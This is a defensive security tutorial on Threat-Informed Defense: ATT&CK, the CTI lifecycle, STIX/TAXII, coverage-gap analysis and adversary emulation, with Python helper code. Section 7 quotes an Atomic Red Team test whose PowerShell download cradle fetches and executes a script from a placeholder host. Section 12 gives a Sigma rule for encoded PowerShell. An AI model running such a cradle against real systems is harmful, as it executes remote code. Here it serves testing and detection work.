Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle

Objective: Understand how defenders operationalize adversary knowledge — the Pyramid of Pain, MITRE ATT&CK, the CTI lifecycle, STIX/TAXII, M3TID/INFORM, and adversary emulation — into a continuous, measurable intelligence-driven security cycle rather than reacting to brittle indicators.


1. The Problem With Reactive Defense

Indicator-centric programs fail because indicators are cheap for the adversary to change. Hashes, IP addresses, and domains rotate trivially — a recompile changes a hash; a new VPS changes an IP. As popularized by David Bianco’s Pyramid of Pain (2013), these atomic indicators detect an adversary only for a fleeting window.

The Pyramid ranks indicator types by how much pain it causes an adversary to change them:

Indicator Type                         | Cost to Adversary
Hash values                            | Trivial
IP addresses                           | Easy
Domain names                           | Simple
Network/host artifacts                 | Annoying
Tools                                  | Challenging
TTPs (Tactics, Techniques, Procedures) | Tough

Documenting activity at the TTP level lets defenders think at an abstraction that is concrete enough to be actionable, yet stable enough to remain valid across adversaries and over time. Unlike traditional models that focus on indicators of compromise (IOCs), behavioral defense maps how adversaries operate once inside the environment. That is the foundation of Threat-Informed Defense.


Figure: Pyramid of Pain hierarchy, from hash values at the base (least adversary pain) to TTPs at the apex (most).
The Pyramid of Pain: indicators near the base are trivial for adversaries to rotate; TTPs at the apex represent durable, costly-to-change behavior.

2. What Is Threat-Informed Defense?

Threat-Informed Defense (TID) is the systematic application of a deep understanding of adversary tradecraft and technology to improve defenses. The MITRE Center for Threat-Informed Defense (CTID) defines it across three operationalized dimensions:

Dimension                       | Question It Answers
Cyber Threat Intelligence (CTI) | Who are our adversaries and which TTPs do they use?
Defensive Measures (DM)         | Do we prevent, detect, and mitigate those specific TTPs?
Testing & Evaluation (T&E)      | Can we prove it by emulating realistic adversary behavior?

The shift is from “Are we patched?” to “Are we defended against these adversaries?” TID is a mindset that prioritizes finite defensive budget against the behaviors that actually threaten your sector.


3. MITRE ATT&CK: Architecture and Anatomy

The MITRE ATT&CK® Framework is a globally accessible knowledge base of adversary TTPs based on real-world observations. Its core objects:

Component                   | Details
Tactics                     | Adversary goals (the why); 14 Enterprise columns.
Techniques / Sub-techniques | How a goal is achieved; ID format TNNNN / TNNNN.NNN.
Groups                      | Named threat-actor profiles (e.g., APT29, FIN7) with mapped techniques.
Software                    | Malware and tools observed in intrusions.
Mitigations & Data Sources  | Controls that counter a technique; telemetry that observes it.
Matrices                    | Enterprise plus ICS, Mobile, and Cloud variants.

The 14 Enterprise tactics, in order: Reconnaissance (TA0043), Resource Development (TA0042), Initial Access (TA0001), Execution (TA0002), Persistence (TA0003), Privilege Escalation (TA0004), Defense Evasion (TA0005), Credential Access (TA0006), Discovery (TA0007), Lateral Movement (TA0008), Collection (TA0009), Command and Control (TA0011), Exfiltration (TA0010), Impact (TA0040). ATT&CK is versioned — always confirm IDs against attack.mitre.org.

ATT&CK is distributed as STIX 2.1. You can parse the public bundle directly to enumerate every technique:

from stix2 import MemoryStore, Filter

# Load the Enterprise bundle from the mitre/cti repo. MemoryStore allows custom
# properties by default, which the x_mitre_* fields in the bundle require.
store = MemoryStore()
store.load_from_file("enterprise-attack.json")

for t in store.query([Filter("type", "=", "attack-pattern")]):
    # Revoked and deprecated techniques remain in the bundle; skip them so the
    # listing reflects the current matrix.
    if t.get("revoked") or t.get("x_mitre_deprecated"):
        continue
    for ref in t.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            print(ref["external_id"], "-", t["name"])

ATT&CK Navigator visualizes and compares coverage layers (JSON format), while ATT&CK Workbench lets organizations manage and extend a local copy of the knowledge base in sync with the public one.


4. The CTI Lifecycle: From Raw Data to Prioritized TTPs

Intelligence is produced, not collected ad hoc. The six-phase CTI lifecycle maps cleanly onto the TID dimensions:

Phase         | Purpose
Direction     | Define intelligence requirements (which sector adversaries matter).
Collection    | Pull from feeds, ISACs, internal incidents.
Processing    | Normalize and structure raw data.
Analysis      | Extract TTPs, attribute, and prioritize.
Dissemination | Deliver to detection engineering / leadership.
Feedback      | Refine requirements from what the consumers needed.

Structured intelligence is exchanged with STIX 2.1 (the data model) over TAXII 2.1 (the transport, supporting Collections and Channels). Open platforms — MISP and OpenCTI — ingest STIX bundles manually, via connectors, or by subscribing to a TAXII feed.

A minimal shareable STIX bundle links a threat actor to a technique through a relationship:

from stix2 import ThreatActor, AttackPattern, Relationship, Bundle, ExternalReference

# STIX 2.1 carries the actor category in threat_actor_types (STIX 2.0 used labels).
actor = ThreatActor(name="APT29", threat_actor_types=["nation-state"])

# The external reference is what ties this object back to the ATT&CK ID.
technique = AttackPattern(
    name="Spearphishing Attachment",
    external_references=[ExternalReference(
        source_name="mitre-attack",
        external_id="T1566.001",
        url="https://attack.mitre.org/techniques/T1566/001")])

# Positional arguments are source_ref, relationship_type, target_ref:
# "APT29 uses T1566.001".
rel = Relationship(actor, "uses", technique)
print(Bundle(actor, technique, rel).serialize(pretty=True))

Automating the loop turns a TAXII feed into a prioritized TTP list for the detection team:

from taxii2client.v21 import Server
from stix2 import parse
import csv

# Credentials are placeholders; use whatever auth the ISAC's TAXII server issues.
server = Server("https://taxii.example-isac.org/taxii2/",
                user="analyst", password="<token>")
collection = server.api_roots[0].collections[0]

# get_objects() returns one TAXII envelope; large collections page, so check the
# envelope's "more" flag (or use taxii2client.v21.as_pages) for production pulls.
ttps = []
for obj in collection.get_objects().get("objects", []):
    so = parse(obj, allow_custom=True)
    if so.get("type") == "attack-pattern":
        for ref in so.get("external_references", []):
            if ref.get("source_name") == "mitre-attack":
                ttps.append((ref["external_id"], so["name"]))

# sorted(set(...)) removes duplicates reported by several sources.
with open("prioritized_ttps.csv", "w", newline="") as f:
    csv.writer(f).writerows([("technique_id", "name"), *sorted(set(ttps))])

Figure: The six-phase CTI lifecycle feeding, via STIX/TAXII dissemination, into the three TID dimensions (defensive measures, testing and evaluation, feedback).
The six-phase CTI lifecycle feeds prioritized TTPs directly into TID’s three operational dimensions, forming a closed, self-improving loop.

5. Building a Sector-Specific Threat Model

You cannot defend against everything, so prioritize. Select the ATT&CK Groups relevant to your sector, extract their techniques, and weight by frequency using CTID’s Sightings Ecosystem data and the Top ATT&CK Techniques Calculator.

The mitreattack-python library pulls a group’s full technique set:

from mitreattack.stix20 import MitreAttackData

# Same enterprise-attack.json from the mitre/cti repo as above.
data = MitreAttackData("enterprise-attack.json")

# Aliases resolve to the intrusion-set object; take the first match.
apt29 = data.get_groups_by_alias("APT29")[0]

# Each entry carries the technique ("object") and the "uses" relationships
# that justify it (useful for citing the sighting behind a mapping).
for entry in data.get_techniques_used_by_group(apt29.id):
    tech = entry["object"]
    print(data.get_attack_id(tech.id), tech["name"])

Layer the result in the Navigator and colour cells by your current detection status. A layer file encodes that scoring directly:

{
  "name": "Detection Coverage - APT29",
  "versions": { "attack": "16", "navigator": "5.1.0", "layer": "4.5" },
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1566.001", "color": "#fc3b3b", "comment": "None - no email detonation telemetry" },
    { "techniqueID": "T1059.001", "color": "#33cc33", "comment": "Detected - Script Block Logging" },
    { "techniqueID": "T1055",     "color": "#ffe766", "comment": "Partial - EDR on workstations only" }
  ]
}
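The weighting step described above, carried through as an added example (not code from the page, from CTID, or from the mitreattack-python project): it counts how many of the selected groups use each technique, skips revoked or deprecated techniques, and writes a Navigator layer in which score carries the frequency weight and colour carries your detection status. It uses only the standard library and a constructed, ATT&CK-shaped STIX fragment (placeholder ids, not real STIX ids) so it runs offline; loading the real enterprise-attack.json into BUNDLE gives the same output for the whole matrix.

```python
"""Weight ATT&CK techniques by how many sector-relevant groups use them and
emit an ATT&CK Navigator layer. Standard library only."""
import json
from collections import Counter

# Constructed fragment in the shape of the ATT&CK STIX bundle: intrusion-set
# (Groups), attack-pattern (Techniques) and "uses" relationships. Placeholder ids.
BUNDLE = {
    "type": "bundle",
    "objects": [
        {"type": "intrusion-set", "id": "intrusion-set--g1", "name": "APT29"},
        {"type": "intrusion-set", "id": "intrusion-set--g2", "name": "FIN7"},
        {"type": "intrusion-set", "id": "intrusion-set--g3", "name": "OtherSectorGroup"},
        {"type": "attack-pattern", "id": "attack-pattern--a1", "name": "Spearphishing Attachment",
         "external_references": [{"source_name": "mitre-attack", "external_id": "T1566.001"}]},
        {"type": "attack-pattern", "id": "attack-pattern--a2", "name": "PowerShell",
         "external_references": [{"source_name": "mitre-attack", "external_id": "T1059.001"}]},
        {"type": "attack-pattern", "id": "attack-pattern--a3", "name": "Scheduled Task/Job",
         "external_references": [{"source_name": "mitre-attack", "external_id": "T1053"}]},
        {"type": "attack-pattern", "id": "attack-pattern--a4", "name": "Retired Technique", "revoked": True,
         "external_references": [{"source_name": "mitre-attack", "external_id": "T0000"}]},
        {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--g1", "target_ref": "attack-pattern--a1"},
        {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--g1", "target_ref": "attack-pattern--a2"},
        {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--g1", "target_ref": "attack-pattern--a4"},
        {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--g2", "target_ref": "attack-pattern--a2"},
        {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--g2", "target_ref": "attack-pattern--a3"},
        {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--g3", "target_ref": "attack-pattern--a1"},
    ],
}

# Colours follow the layer file shown above: red = no detection, yellow = partial, green = detected.
STATUS_COLOR = {"none": "#fc3b3b", "partial": "#ffe766", "detected": "#33cc33"}


def attack_id(obj):
    """Return the ATT&CK ID (TNNNN / TNNNN.NNN) from an object's external references."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref["external_id"]
    return None


def technique_frequency(bundle, group_names):
    """Count, per technique, how many of the named groups use it.
    Returns (Counter of technique id -> group count, dict of id -> name)."""
    objs = {o["id"]: o for o in bundle["objects"] if "id" in o}
    groups = {oid for oid, o in objs.items()
              if o["type"] == "intrusion-set" and o["name"] in group_names}
    pairs, names = set(), {}
    for o in bundle["objects"]:
        if o["type"] != "relationship" or o.get("relationship_type") != "uses":
            continue
        if o["source_ref"] not in groups:
            continue
        tech = objs.get(o["target_ref"])
        if not tech or tech["type"] != "attack-pattern":
            continue
        # Revoked/deprecated techniques must not drive a current threat model.
        if tech.get("revoked") or tech.get("x_mitre_deprecated"):
            continue
        tid = attack_id(tech)
        pairs.add((o["source_ref"], tid))   # dedupe repeated group->technique links
        names[tid] = tech["name"]
    return Counter(tid for _, tid in pairs), names


def build_layer(counts, names, detection_status, layer_name="Sector threat model"):
    """Navigator layer: most-used techniques first; score = frequency, colour = detection status."""
    techniques = []
    for tid, n in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0])):
        status = detection_status.get(tid, "none")
        techniques.append({
            "techniqueID": tid,
            "score": n,
            "color": STATUS_COLOR[status],
            "comment": f"{names[tid]}: used by {n} selected group(s); detection={status}",
        })
    return {
        "name": layer_name,
        "versions": {"attack": "16", "navigator": "5.1.0", "layer": "4.5"},
        "domain": "enterprise-attack",
        "techniques": techniques,
    }


if __name__ == "__main__":
    counts, names = technique_frequency(BUNDLE, {"APT29", "FIN7"})
    # Constructed self-assessment of current detection status per technique.
    status = {"T1059.001": "detected", "T1053": "partial"}
    print(json.dumps(build_layer(counts, names, status), indent=2))
```

The layer keeps score and colour separate on purpose: Navigator can render a score gradient, but a gradient would hide the detection status, so the status is pinned to an explicit colour and the frequency stays available for sorting.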

6. Mapping Controls to ATT&CK: The Defensive Measures Dimension

Knowing the adversary is useless without knowing your own coverage. CTID’s Mappings Explorer lets defenders see how security capabilities map to ATT&CK, and the NIST SP 800-53 ↔ ATT&CK mappings let you assess control coverage against real-world techniques.

The critical pitfall: ATT&CK coverage ≠ detection coverage. A control that can mitigate a technique is not the same as telemetry that proves you detect it. Distinguish two gap types:

Gap Type      | Meaning
Coverage gap  | No control or telemetry exists for the technique.
Detection gap | Telemetry exists, but no analytic fires on it.

Re-run the Mappings Explorer comparison before and after each emulation cycle to quantify the coverage delta — that delta is your measurable program improvement.
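To make the two gap types and the coverage delta concrete, here is an added example (not Mappings Explorer output or CTID code; every set below is constructed). It classifies each threat-model technique from three inputs (mapped controls, available telemetry, analytics that fire) and diffs two assessment cycles. It adds one state the table above does not name, control_only, for a technique with a mapped control but no telemetry, because that is exactly the "mapped but never validated" case the checkbox pitfall warns about.

```python
"""Classify threat-model techniques into covered / gap states and compute the
coverage delta between two assessment cycles. Standard library only."""

# Constructed inputs. In practice THREAT_MODEL comes from the sector threat
# model, CONTROLS from the control-to-ATT&CK mappings, TELEMETRY from the data
# sources you actually collect, ANALYTICS from rules tagged with ATT&CK IDs.
THREAT_MODEL = {"T1566.001", "T1059.001", "T1053", "T1055", "T1078"}
CONTROLS = {"T1566.001", "T1059.001", "T1053", "T1055"}
TELEMETRY_CYCLE1 = {"T1059.001", "T1053", "T1078"}
ANALYTICS_CYCLE1 = {"T1059.001"}
# Cycle 2: EDR telemetry added for T1055, and a scheduled-task analytic written.
TELEMETRY_CYCLE2 = TELEMETRY_CYCLE1 | {"T1055"}
ANALYTICS_CYCLE2 = ANALYTICS_CYCLE1 | {"T1053"}

# Ordering used to decide whether a technique improved or regressed.
RANK = {"coverage_gap": 0, "control_only": 1, "detection_gap": 2, "detected": 3}


def classify(threat_model, controls, telemetry, analytics):
    """Return {technique_id: state} for every technique in the threat model.

    detected       telemetry exists and an analytic fires on it
    detection_gap  telemetry exists but no analytic uses it
    control_only   a control is mapped but nothing observes the technique (unvalidated)
    coverage_gap   neither control nor telemetry exists
    """
    status = {}
    for tid in sorted(threat_model):
        if tid in telemetry and tid in analytics:
            status[tid] = "detected"
        elif tid in telemetry:
            status[tid] = "detection_gap"
        elif tid in controls:
            status[tid] = "control_only"
        else:
            status[tid] = "coverage_gap"
    return status


def coverage_delta(before, after):
    """Diff two cycle assessments: which techniques moved up or down the
    ranking, and the net change in the number of detected techniques."""
    improved = sorted(t for t in after
                      if RANK[after[t]] > RANK[before.get(t, "coverage_gap")])
    regressed = sorted(t for t in after
                       if RANK[after[t]] < RANK[before.get(t, "coverage_gap")])
    detected_before = sum(s == "detected" for s in before.values())
    detected_after = sum(s == "detected" for s in after.values())
    return {"improved": improved, "regressed": regressed,
            "detected_delta": detected_after - detected_before}


def run_cycles():
    """Assess both constructed cycles and return (cycle1, cycle2, delta)."""
    c1 = classify(THREAT_MODEL, CONTROLS, TELEMETRY_CYCLE1, ANALYTICS_CYCLE1)
    c2 = classify(THREAT_MODEL, CONTROLS, TELEMETRY_CYCLE2, ANALYTICS_CYCLE2)
    return c1, c2, coverage_delta(c1, c2)


if __name__ == "__main__":
    c1, c2, delta = run_cycles()
    for tid in sorted(THREAT_MODEL):
        print(f"{tid:<10} {c1[tid]:<14} -> {c2[tid]}")
    print(delta)
```

The detection_gap entries are the ones to hand to detection engineering first: the telemetry cost is already paid and only the analytic is missing, whereas a coverage_gap needs a new data source before any rule can be written.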


7. Testing & Evaluation: Closing the Loop

T&E proves defenses work by emulating real adversary behavior. Distinguish the disciplines:

Approach                          | Focus
Penetration testing               | Find exploitable vulnerabilities.
Adversary emulation               | Reproduce a specific actor’s TTP chain.
Breach & Attack Simulation (BAS)  | Continuous, automated technique validation.

MITRE CALDERA is a scalable, automated adversary-emulation platform; Atomic Red Team (Red Canary) is a library of small, ATT&CK-mapped tests for fast technique validation; and the CTID Adversary Emulation Library provides full emulation plans modeled on real threats. Run them as purple-team exercises — red executes, blue observes, both tune in real time.

# T1059.001 - Atomic Red Team test metadata (YAML excerpt)
attack_technique: T1059.001
display_name: PowerShell
atomic_tests:
  - name: Download cradle execution
    executor:
      name: powershell
      command: |
        IEX (New-Object Net.WebClient).DownloadString('#{cradle_url}')
    input_arguments:
      cradle_url:
        type: url
        default: https://example.test/benign.ps1

# PowerShell on the test host: execute one atomic test, then confirm the telemetry fired
Import-Module invoke-atomicredteam
Invoke-AtomicTest T1059.001 -TestNumbers 1
# Map result -> Navigator: green only if Sysmon EID 1 + Script Block Log observed

If the test fires but no analytic alerts, you have found a detection gap — feed it straight back into the cycle.


8. M3TID and INFORM: Measuring Program Maturity

CTID’s M3TID (Measure, Maximize, Mature Threat-Informed Defense) operationalizes the three dimensions and assigns relative weighting:

Dimension                 | Weight
Cyber Threat Intelligence | 30%
Defensive Measures        | 50%
Testing & Evaluation      | 20%

The weighting reflects that defensive measures are where threat knowledge becomes protection. INFORM (Jan 2026) builds on M3TID, translating CTI, defensive measures, and T&E into a measurable, repeatable strategic maturity practice. Treat M3TID as the foundational reference and INFORM as its strategic-maturity successor — they are distinct publications, not synonyms. Self-assess each dimension, multiply by its weight, and invest where the lowest weight-adjusted score sits.


9. The Intelligence-Driven Security Cycle: Putting It All Together

The dimensions form a continuous loop, not a one-time audit:

  1. Direction/CTI: Ingest sector intelligence via TAXII; extract prioritized TTPs.
  2. Threat model: Layer relevant ATT&CK Groups in Navigator.
  3. Defensive measures: Map controls via Mappings Explorer; identify gaps.
  4. T&E: Emulate the TTP chain with CALDERA / Atomic Red Team.
  5. Measure: Score coverage delta and M3TID maturity.
  6. Feedback: Failed detections become new CTI collection requirements.

Each rotation tightens coverage against the adversaries you actually face. The loop never closes — new sightings continuously reshape the threat model.


Figure: The intelligence-driven security cycle, flowing from CTI ingest through threat modelling, gap analysis, adversary emulation and maturity measurement back to new collection requirements.
The intelligence-driven security cycle is self-reinforcing: failed detections become collection requirements that sharpen the next rotation.

10. Common Pitfalls and Maturity Anti-Patterns

  • The “ATT&CK checkbox” fallacy — colouring a cell green for a control that is mapped but never validated.
  • Retroactive labeling — tagging alerts with technique IDs after the fact instead of engineering proactive detections.
  • IOC over-reliance — building the program on indicators near the bottom of the Pyramid of Pain.
  • Treating the matrix as static — ATT&CK is versioned; threat models decay if not refreshed.
  • Stale TTPs — driving investment from sightings years old without re-validation.

11. Common Attacker Techniques

These are the behaviors a TID program is built to detect — the worked examples throughout the cycle:

Technique                                               | Description
T1566 Phishing / T1566.001 Spearphishing Attachment     | Initial Access; canonical threat-modeling example (used by APT29).
T1059.001 PowerShell                                    | Execution; most common sub-technique in emulation runs.
T1053 Scheduled Task/Job                                | Persistence; linked to FIN7 in ATT&CK.
T1055 Process Injection                                 | Defense Evasion; illustrates a deep sub-technique hierarchy.
T1078 Valid Accounts                                    | Credential Access/Persistence; shows why behavior beats IOCs.
T1021 Remote Services                                   | Lateral Movement; common in sector threat models.
T1486 Data Encrypted for Impact                         | Impact; ransomware-focused modeling.

12. Defensive Strategies & Detection

TID succeeds only if emulation is observable. Validate that the following telemetry fires during every T&E run:

Source                                     | Detail
Sysmon Event ID 1                          | Process Create — baseline for technique execution (Image, CommandLine, ParentImage, Hashes).
Sysmon Event ID 3                          | Network Connect — C2 simulation (DestinationIp, DestinationPort, Image).
Sysmon Event ID 11                         | File Create — emulation artifact drops (TargetFilename).
Security Event 4688                        | Native process creation; requires Audit Process Creation + command-line logging GPO.
Security Event 4624 / 4625                 | Logon success/failure — credential-access techniques.
PowerShell Script Block Logging            | ETW Microsoft-Windows-PowerShell ({A0C1853B-5C40-4B15-8766-3CF1C58F985A}) — captures T1059.001.
ETW Microsoft-Windows-Threat-Intelligence  | Kernel provider consumed by EDR for T1055.* injection patterns.

Anchor every detection to an ATT&CK ID so coverage is measurable. A skeleton Sigma rule for encoded PowerShell:

title: Suspicious PowerShell Encoded Command Execution
status: experimental
description: Detects powershell.exe launched with an encoded command argument (T1059.001).
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
  condition: selection
falsepositives:
  - Administrative and deployment scripts that legitimately pass encoded commands
tags:
  - attack.execution
  - attack.t1059.001
  - attack.ta0002
level: medium
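To show what the rule above actually matches, and how an emulation run can fire without the analytic alerting (the detection gap from Section 7), here is an added example (not sigma-cli, pySigma or any SigmaHQ code): a deliberately small evaluator for the modifiers the rule uses (equality, contains, startswith, endswith), with Sigma's case-insensitive string matching, applied to constructed process_creation events. The rule is embedded as a Python dict rather than parsed from YAML so the block runs without PyYAML.

```python
"""Evaluate a Sigma-style selection over constructed process_creation events
and report the ATT&CK technique IDs the rule is tagged with."""
import re

# The skeleton rule from this section, as a dict (same fields and values).
RULE = {
    "title": "Suspicious PowerShell Encoded Command Execution",
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["-enc", "-EncodedCommand"],
        },
        "condition": "selection",
    },
    "tags": ["attack.execution", "attack.t1059.001", "attack.ta0002"],
}

# Constructed Sysmon EID 1 style events; the encoded payloads are dummy text.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand AAAA"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",        # PowerShell 7 host
     "CommandLine": "pwsh.exe -enc AAAA"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c echo -enc"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -eNc AAAA"},                    # odd casing
]

# Only technique tags (attack.tNNNN or attack.tNNNN.NNN); attack.taNNNN is a tactic.
TECH_TAG = re.compile(r"^attack\.(t\d{4}(?:\.\d{3})?)$", re.IGNORECASE)


def _match_value(modifier, actual, expected):
    """One field/value comparison. Sigma string matching is case-insensitive."""
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    return a == e


def selection_matches(selection, event):
    """Fields within a selection are ANDed; a list of values for a field is ORed."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(modifier, event[field], v) for v in values):
            return False
    return True


def rule_matches(rule, event):
    """Evaluate the rule; only a condition naming a single selection is supported."""
    det = rule["detection"]
    cond = det["condition"].strip()
    if cond not in det:
        raise ValueError(f"unsupported condition: {cond!r}")
    return selection_matches(det[cond], event)


def technique_tags(rule):
    """ATT&CK technique IDs the rule claims coverage for, e.g. ['T1059.001']."""
    return sorted(m.group(1).upper()
                  for t in rule.get("tags", []) if (m := TECH_TAG.match(t)))


def evaluate(rule, events):
    """Indexes of matching events plus the techniques the matches count toward."""
    hits = [i for i, ev in enumerate(events) if rule_matches(rule, ev)]
    return {"matched_event_indexes": hits, "techniques": technique_tags(rule)}


if __name__ == "__main__":
    print(evaluate(RULE, EVENTS))
```

Events 0 and 4 match, and nothing else does: event 1 has no encoded argument, event 3 is not PowerShell at all, and event 2 is an encoded command run through pwsh.exe, which the rule's Image filter excludes. If an emulation run uses the PowerShell 7 host, Script Block Logging still records it but this analytic stays silent, which is precisely a detection gap to feed back into the cycle, for example by adding '\pwsh.exe' to the Image list and re-validating.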

Hardening baselines: enable command-line process auditing (ProcessCreationIncludeCmdLine_Enabled); enforce PowerShell Constrained Language Mode with Script Block and Module Logging; deploy Sysmon with a maintained config (e.g., SwiftOnSecurity) validated against each technique’s ATT&CK data sources; enforce a TTP expiry policy (re-validate sightings older than 24 months); and configure automated TAXII ingest from ISAC/CERT networks.


13. Tools for Threat-Informed Defense

Tool               | Description                                          | Link
ATT&CK Navigator   | Layer-based technique coverage visualization         | attack.mitre.org
ATT&CK Workbench   | Manage and extend a local ATT&CK copy                | ctid.mitre.org
MISP               | Open-source threat-intelligence platform (STIX/TAXII)| misp-project.org
OpenCTI            | STIX 2.1 ingestion via connectors and TAXII          | filigran.io
MITRE CALDERA      | Automated adversary emulation                        | caldera.mitre.org
Atomic Red Team    | ATT&CK-mapped atomic test library                    | atomicredteam.io
Mappings Explorer  | Security controls mapped to ATT&CK                   | ctid.mitre.org
Sigma              | SIEM-agnostic detection rule standard                | sigmahq.io

14. MITRE ATT&CK Mapping

Technique                           | MITRE ID            | Detection
Phishing / Spearphishing Attachment | T1566 / T1566.001   | Mail-gateway detonation; Sysmon EID 1/11 on child processes.
PowerShell                          | T1059.001           | Script Block Logging; Sigma on -enc.
Scheduled Task/Job                  | T1053               | Security Event 4698; Sysmon EID 1 (schtasks.exe).
Process Injection                   | T1055               | ETW Threat-Intelligence; EDR memory analytics.
Valid Accounts                      | T1078               | Security Event 4624 anomaly baselining.
Remote Services                     | T1021               | Sysmon EID 3; logon-type correlation.
Data Encrypted for Impact           | T1486               | Sysmon EID 11 mass-write; canary files.

Summary

  • Threat-Informed Defense replaces brittle IOC reaction with stable, behavior-centric defense built on adversary TTPs.
  • The Pyramid of Pain motivates the shift; MITRE ATT&CK supplies the shared TTP vocabulary across Tactics, Techniques, Groups, and Mitigations.
  • TID’s three dimensions — CTI, Defensive Measures, Testing & Evaluation — connect through the six-phase CTI lifecycle and exchange intelligence via STIX 2.1 over TAXII 2.1.
  • M3TID measures maturity (CTI 30%, DM 50%, T&E 20%); INFORM is its strategic successor.
  • Close the loop with CALDERA, Atomic Red Team, and the CTID Adversary Emulation Library, validating every technique against Sysmon and ATT&CK-tagged Sigma rules.
